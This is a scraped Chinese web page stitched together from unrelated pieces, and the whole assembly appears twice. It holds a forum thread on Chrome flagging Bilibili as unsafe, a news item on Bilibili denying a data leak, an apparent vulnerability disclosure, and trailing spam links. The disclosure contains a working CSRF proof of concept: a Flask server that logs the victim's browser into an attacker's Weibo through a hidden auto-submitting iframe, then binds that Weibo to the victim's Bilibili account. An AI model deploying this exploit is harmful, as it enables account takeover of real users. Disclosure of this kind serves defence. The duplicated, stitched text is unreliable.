B站网址能打开 curl 不通打开不安全
点击联系发帖人
时间:2018-06-08 18:46
拒绝访问 | www.yo81.cn | 百度云加速
请打开cookies.
此网站 (www.yo81.cn) 的管理员禁止了您的访问。原因是您的访问包含了非浏览器特征(8043bf-ua98).
重新安装浏览器,或使用别的浏览器IIS不允许匿名关于网页请求时弹出windows安全性验证
[问题点数:40分,结帖人Hsuwen]
IIS不允许匿名关于网页请求时弹出windows安全性验证
[问题点数:40分,结帖人Hsuwen]
不显示删除回复
显示所有回复
显示星级回复
显示得分回复
只显示楼主
匿名用户不能发表回复!|请完成以下验证码
查看: 8121|回复: 6
chrome看b站报不安全
本帖最后由
15:30 编辑
QQ截图48.png (0 Bytes, 下载次数: 2)
15:25 上传
有时候刷新能进去但页面显示不正常,其它网站没有这个问题,其它浏览器没有这个问题。
本帖最后由 liu浪的人 于
16:57 编辑
可能是你的DNS有问题吧,图上显示的IP是阿里云的,B站的IP我这边解析出来不是这个。
而且我这边直接访问图上这个IP,Chrome也不会拦截。
本人山东广电宽带、山东移动宽带、山东联通测试正常
可能是你的DNS有问题吧,图上显示的IP是阿里云的,B站的IP我这边解析出来不是这个。
而且我这边直接访问图 ...
QQ截图19.png (0 Bytes, 下载次数: 1)
18:46 上传
fireherman
是不是因为这个:
导致整个网站被拉黑(FireFox可以正常打开)
是不是因为这个:http://bbs.kafan.cn/thread--1.html
导致整个网站被拉黑(FireFox可以正 ...
那倒不是,我问了一些用chrome的朋友,他们那里没有问题,应该是运营商的问题
chrome皮肤好评
Copyright & KaFan &KaFan.cn All Rights Reserved.
Powered by Discuz! X3.4( 苏ICP备号 ) GMT+8,B站发布官方声明 用户账户信息未被泄露
发表于 14:45|
来源互联网|
作者互联网
摘要:自2月20日凌晨起,有部分B站UP主陆续在社交平台反馈:快视频平台上部分账号未经授权盗取其原创视频内容。快视频针对此事也在第一时间发布了声明,并欢迎与B站信息安全部门无缝对接,对于网友所反映的“账号安全问题”进行进一步沟通和确认,共同维护各位UP主的安全和利益。
自2月20日凌晨起,有部分B站UP主陆续在社交平台反馈:快视频平台上部分账号未经授权盗取其原创视频内容。快视频针对此事也在第一时间发布了声明,并欢迎与B站信息安全部门无缝对接,对于网友所反映的&账号安全问题&进行进一步沟通和确认,共同维护各位UP主的安全和利益。
经过一整天紧急排查,B站官方也于20日晚发布了调查结果声明。
从B站的调查结果中可以看出,B站的用户账号信息并不存在&被脱库&。关于部分UP主所说的&用B站注册的手机号码和密码可直接登录快视频&的情况,B站表示通过技术手段并不能重现。
而且经过进一步用户回访发现,能直接登录的用户,大多数是因为之前用相同的密码注册了360旗下的其他产品,如安全卫士、云盘等。而360的所有产品线都是使用统一SSO来登录的。也就是说,用户所说的能够用来登录快视频的&B站账号和密码&,其实是之前用来登录360系产品的账号密码,而不是由于&数据泄露&、&脱库&等原因造成的。
双方官方声明已出,相信广大网友也放心不少。不过这一事件也提醒我们,在各种网站、软件、社交平台上注册账户时,尽量不要使用完全相同的账号和密码,提高安全意识,保护个人信息。
【免责声明:CSDN本栏目发布信息,目的在于传播更多信息,丰富网络文化,稿件仅代表作者个人观点,与CSDN无关。其原创性以及中文陈述文字和文字内容未经本网证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本网不做任何保证或者承诺,请读者仅作参考,并请自行核实相关内容。凡注明为其他媒体来源的信息,均为转载自其他媒体,转载并不代表本网赞同其观点,也不代表本网对其真实性负责。您若对该稿件由任何怀疑或质疑,请即与CSDN联系,我们将迅速给您回应并做处理。】&
推荐阅读相关主题:
CSDN官方微信
扫描二维码,向CSDN吐槽
微信号:CSDNnews
相关热门文章点我的链接我就可能会进入你的B站账号
点我的链接我就可能会进入你的B站账号
bilibili.com
厂商已经确认
在B站上,用户是允许绑定微博登陆的,然而绑定的接口是可以CSRF的,也就是说当用户登录后,点击我的链接,我就可以调用该接口完成绑定,绑定后就可以用我使用的微博进行登录了。具体接口如下:
https://account.bilibili.com/login?sns=weibo
问题的关键点在于此接口的CSRF,而另外一个难题就是如何在用户的浏览器上登录我的微博了。
0x01 注册一个微博,然后用微博授权给bilibili。要先授权的原因是在伟哥的漏洞中已经提到过,这里引用并修改一下:“新浪微博的授权有如下特点,如果当前登陆的微博曾经授权过bilibili,那么就会自动绑定成功”
0x02 用一个隐藏的iframe在用户的浏览器上登录我们指定的微博。这里使用到的接口有个问题需要注意,就是请求参数中password_4555和vk=_,这两个参数是在http://login.weibo.cn/中生成的,有一定的时效性,后端会校验是否合法,因此我们需要动态生成登录的表单。我写了一个简单的flask接口,在服务端请求后提取出来生成表单,然后前端自动提交即可完成登录。
POST /login/ HTTP/1.1
Host: login.weibo.cn
Content-Type: application/x-www-form-urlencoded
mobile=weibo_username&password_4555=weibo_password&remember=on&backURL=http%253A%252F%252Fweibo.cn%252F&backTitle=%E5%BE%AE%E5%8D%9A&tryCount=&vk=_&submit=%E7%99%BB%E5%BD%95
0x03 登录微博后前端就可以用Image加载指定的URL,完成绑定了。如果用户先绑定了微博,需要先解绑,然后再绑定,具体过程看漏洞证明中的代码。
0x04 用户访问完以上的页面后,我们就可以利用上面的微博账号登录到用户的bilibili账号了。
漏洞证明:
我直接给出我写个一个flask程序,依赖flask和beautifulsoup,就不在我自己的主机上搭测试环境了。
$ pip install flask beautifulsoup && python server.py
server.py,自己改一下weibo_username和weibo_password吧。
# -*- coding: utf-8 -*-
import requests
from flask import Flask
from BeautifulSoup import BeautifulSoup
app = Flask(__name__)
login_weibo_form = u'''
&form action=&http://login.weibo.cn/login/& method=&post&&
&input type=&text& name=&mobile& value=&weibo_username&/&
&input type=&text& name=&%s& value=&weibo_password&/&
&input type=&text& name=&remember& value=&on&/&
&input type=&text& name=&backURL& value=&http://weibo.cn/&/&
&input type=&text& name=&backTitle& value=&微博&/&
&input type=&text& name=&tryCount& value=&&/&
&input type=&text& name=&vk& value=&%s&/&
&input type=&submit& name=&submit& value=&登录& id=&submit_btn&/&
&script& document.getElementById('submit_btn').click(); &/script&
'''
@app.route('/login_weibo', methods=['GET'])
def login_weibo():
res = requests.get('http://login.weibo.cn/login/')
soup = BeautifulSoup(res.text)
password_name = soup.find('input', type='password')['name']
vk_value = soup.find('input', {'name': 'vk'})['value']
return login_weibo_form % (password_name, vk_value)
csrf_bind_weibo = '''
&iframe src=&/login_weibo& sandbox=&allow-forms allow-scripts&&&/iframe&
function unbind() {
var img = new Image();
img.src = &https://account.bilibili.com/site/unbind?sns=weibo&;
function bind() {
var img = new Image();
img.src = 'https://account.bilibili.com/login?sns=weibo';
setTimeout(function() {
setTimeout(function() {
'''
@app.route('/', methods=['GET'])
def steal_bilibili():
return csrf_bind_weibo
if __name__ == '__main__':
app.run(host=&0.0.0.0&, port=80, debug=True)
运行后访问页面,你就会发现:
修复方案:
修复绑定接口的CSRF。
版权声明:转载请注明来源 @
必填(保密)
快来写下你的想法吧!
文章数:38560
(C) 安全脉搏}
请打开cookies.
此网站 (www.yo81.cn) 的管理员禁止了您的访问。原因是您的访问包含了非浏览器特征(8043bf-ua98).
重新安装浏览器,或使用别的浏览器IIS不允许匿名关于网页请求时弹出windows安全性验证
[问题点数:40分,结帖人Hsuwen]
IIS不允许匿名关于网页请求时弹出windows安全性验证
[问题点数:40分,结帖人Hsuwen]
不显示删除回复
显示所有回复
显示星级回复
显示得分回复
只显示楼主
匿名用户不能发表回复!|请完成以下验证码
查看: 8121|回复: 6
chrome看b站报不安全
本帖最后由
15:30 编辑
QQ截图48.png (0 Bytes, 下载次数: 2)
15:25 上传
有时候刷新能进去但页面显示不正常,其它网站没有这个问题,其它浏览器没有这个问题。
本帖最后由 liu浪的人 于
16:57 编辑
可能是你的DNS有问题吧,图上显示的IP是阿里云的,B站的IP我这边解析出来不是这个。
而且我这边直接访问图上这个IP,Chrome也不会拦截。
本人山东广电宽带、山东移动宽带、山东联通测试正常
可能是你的DNS有问题吧,图上显示的IP是阿里云的,B站的IP我这边解析出来不是这个。
而且我这边直接访问图 ...
QQ截图19.png (0 Bytes, 下载次数: 1)
18:46 上传
fireherman
是不是因为这个:
导致整个网站被拉黑(FireFox可以正常打开)
是不是因为这个:http://bbs.kafan.cn/thread--1.html
导致整个网站被拉黑(FireFox可以正 ...
那倒不是,我问了一些用chrome的朋友,他们那里没有问题,应该是运营商的问题
chrome皮肤好评
Copyright & KaFan &KaFan.cn All Rights Reserved.
Powered by Discuz! X3.4( 苏ICP备号 ) GMT+8,B站发布官方声明 用户账户信息未被泄露
发表于 14:45|
来源互联网|
作者互联网
摘要:自2月20日凌晨起,有部分B站UP主陆续在社交平台反馈:快视频平台上部分账号未经授权盗取其原创视频内容。快视频针对此事也在第一时间发布了声明,并欢迎与B站信息安全部门无缝对接,对于网友所反映的“账号安全问题”进行进一步沟通和确认,共同维护各位UP主的安全和利益。
自2月20日凌晨起,有部分B站UP主陆续在社交平台反馈:快视频平台上部分账号未经授权盗取其原创视频内容。快视频针对此事也在第一时间发布了声明,并欢迎与B站信息安全部门无缝对接,对于网友所反映的&账号安全问题&进行进一步沟通和确认,共同维护各位UP主的安全和利益。
经过一整天紧急排查,B站官方也于20日晚发布了调查结果声明。
从B站的调查结果中可以看出,B站的用户账号信息并不存在&被脱库&。关于部分UP主所说的&用B站注册的手机号码和密码可直接登录快视频&的情况,B站表示通过技术手段并不能重现。
而且经过进一步用户回访发现,能直接登录的用户,大多数是因为之前用相同的密码注册了360旗下的其他产品,如安全卫士、云盘等。而360的所有产品线都是使用统一SSO来登录的。也就是说,用户所说的能够用来登录快视频的&B站账号和密码&,其实是之前用来登录360系产品的账号密码,而不是由于&数据泄露&、&脱库&等原因造成的。
双方官方声明已出,相信广大网友也放心不少。不过这一事件也提醒我们,在各种网站、软件、社交平台上注册账户时,尽量不要使用完全相同的账号和密码,提高安全意识,保护个人信息。
【免责声明:CSDN本栏目发布信息,目的在于传播更多信息,丰富网络文化,稿件仅代表作者个人观点,与CSDN无关。其原创性以及中文陈述文字和文字内容未经本网证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本网不做任何保证或者承诺,请读者仅作参考,并请自行核实相关内容。凡注明为其他媒体来源的信息,均为转载自其他媒体,转载并不代表本网赞同其观点,也不代表本网对其真实性负责。您若对该稿件由任何怀疑或质疑,请即与CSDN联系,我们将迅速给您回应并做处理。】&
推荐阅读相关主题:
CSDN官方微信
扫描二维码,向CSDN吐槽
微信号:CSDNnews
相关热门文章点我的链接我就可能会进入你的B站账号
点我的链接我就可能会进入你的B站账号
bilibili.com
厂商已经确认
在B站上,用户是允许绑定微博登陆的,然而绑定的接口是可以CSRF的,也就是说当用户登录后,点击我的链接,我就可以调用该接口完成绑定,绑定后就可以用我使用的微博进行登录了。具体接口如下:
https://account.bilibili.com/login?sns=weibo
问题的关键点在于此接口的CSRF,而另外一个难题就是如何在用户的浏览器上登录我的微博了。
0x01 注册一个微博,然后用微博授权给bilibili。要先授权的原因是在伟哥的漏洞中已经提到过,这里引用并修改一下:“新浪微博的授权有如下特点,如果当前登陆的微博曾经授权过bilibili,那么就会自动绑定成功”
0x02 用一个隐藏的iframe在用户的浏览器上登录我们指定的微博。这里使用到的接口有个问题需要注意,就是请求参数中password_4555和vk=_,这两个参数是在http://login.weibo.cn/中生成的,有一定的时效性,后端会校验是否合法,因此我们需要动态生成登录的表单。我写了一个简单的flask接口,在服务端请求后提取出来生成表单,然后前端自动提交即可完成登录。
POST /login/ HTTP/1.1
Host: login.weibo.cn
Content-Type: application/x-www-form-urlencoded
mobile=weibo_username&password_4555=weibo_password&remember=on&backURL=http%253A%252F%252Fweibo.cn%252F&backTitle=%E5%BE%AE%E5%8D%9A&tryCount=&vk=_&submit=%E7%99%BB%E5%BD%95
0x03 登录微博后前端就可以用Image加载指定的URL,完成绑定了。如果用户先绑定了微博,需要先解绑,然后再绑定,具体过程看漏洞证明中的代码。
0x04 用户访问完以上的页面后,我们就可以利用上面的微博账号登录到用户的bilibili账号了。
漏洞证明:
我直接给出我写个一个flask程序,依赖flask和beautifulsoup,就不在我自己的主机上搭测试环境了。
$ pip install flask beautifulsoup && python server.py
server.py,自己改一下weibo_username和weibo_password吧。
# -*- coding: utf-8 -*-
import requests
from flask import Flask
from BeautifulSoup import BeautifulSoup
app = Flask(__name__)
login_weibo_form = u'''
&form action=&http://login.weibo.cn/login/& method=&post&&
&input type=&text& name=&mobile& value=&weibo_username&/&
&input type=&text& name=&%s& value=&weibo_password&/&
&input type=&text& name=&remember& value=&on&/&
&input type=&text& name=&backURL& value=&http://weibo.cn/&/&
&input type=&text& name=&backTitle& value=&微博&/&
&input type=&text& name=&tryCount& value=&&/&
&input type=&text& name=&vk& value=&%s&/&
&input type=&submit& name=&submit& value=&登录& id=&submit_btn&/&
&script& document.getElementById('submit_btn').click(); &/script&
'''
@app.route('/login_weibo', methods=['GET'])
def login_weibo():
res = requests.get('http://login.weibo.cn/login/')
soup = BeautifulSoup(res.text)
password_name = soup.find('input', type='password')['name']
vk_value = soup.find('input', {'name': 'vk'})['value']
return login_weibo_form % (password_name, vk_value)
csrf_bind_weibo = '''
&iframe src=&/login_weibo& sandbox=&allow-forms allow-scripts&&&/iframe&
function unbind() {
var img = new Image();
img.src = &https://account.bilibili.com/site/unbind?sns=weibo&;
function bind() {
var img = new Image();
img.src = 'https://account.bilibili.com/login?sns=weibo';
setTimeout(function() {
setTimeout(function() {
'''
@app.route('/', methods=['GET'])
def steal_bilibili():
return csrf_bind_weibo
if __name__ == '__main__':
app.run(host=&0.0.0.0&, port=80, debug=True)
运行后访问页面,你就会发现:
修复方案:
修复绑定接口的CSRF。
版权声明:转载请注明来源 @
必填(保密)
快来写下你的想法吧!
文章数:38560
(C) 安全脉搏}
我要回帖
更多关于 微信不能直接打开网址 的文章
更多推荐
- ·去日本旅游攻略最佳线路推荐什么交通卡比较方便啊?
- ·新N车牌号是哪个地区的是新疆哪里的车牌
- ·新疆各地区车牌号简称简称是什么?
- ·拉萨酒店排名的酒店有哪些
- ·新疆十大煤矿排名最新有哪些煤矿
- ·眼睛干涩 肝的人肝不好,几个简单小动作,最养肝
- ·如何评价勇士的格林这名火箭队14号球员格林,其表现是否超越篮球范畴
- ·痛风病友尿ph多少如何选择运动方式
- ·看姚明打篮球比赛视频如何给山村孩子们上篮球课
- ·跟篮球运动员打架里谁打架最
- ·这不是一只烟斗 pdfk叔,你是会员吗?
- ·求全职高手 动漫动漫全集
- ·支架游泳池池支架游泳池后回家必须洗澡吗 支架游泳池池支架游泳池后用什么洗澡
- ·IFA足球是骗局吗 ifa足球理财是骗局吗能长久吗
- ·詹姆斯使节98你们觉得哪个配色好看
- ·微胖美女瘦下来会很惊艳吗
- ·nba历史十大分卫第一分卫是谁
- ·请大家交流练习曲目应该单手好还是双手练好
- ·据说下个卡包有98的骑士詹姆斯回骑士,2k还是没有
- ·B站网址能打开 curl 不通打开不安全
- ·mg花花公子免费转mg不朽的浪漫滴血问题都有哪些?
- ·勇士全是勇士移动掩护护啊,怎么不吹犯规
- ·训练不当什么原因会导致肾衰竭肌肉溶解,肾衰竭,你还敢瞎练吗
- ·求推荐是dnf男柔道道好还是女柔道好
- ·球场暴力,何时肺结核吃多久药才能停停
- ·威少威少和杜兰特互喷库里他们穿的这些是紧身裤还是什么
- ·大家户外插座是如何室外防雨插座的
- ·阳西哪家健身房月卡一般多少钱比较好,月卡多少钱
- ·胖女生胖人减肥计划成功的照片
- ·詹姆斯科比对位谁厉害与科比谁的技术好
- ·夫子在上白糖奶兔 谭晓彤资源百度云资源
- ·各位大神们求图片出处谢谢柏文 好人一生平安安
- ·浅谈如何上好一堂篮球课训练课
- ·怎么鉴别阿迪达斯官网鉴别真伪查询真假
- ·如何在家健身减肥运动减肥方法
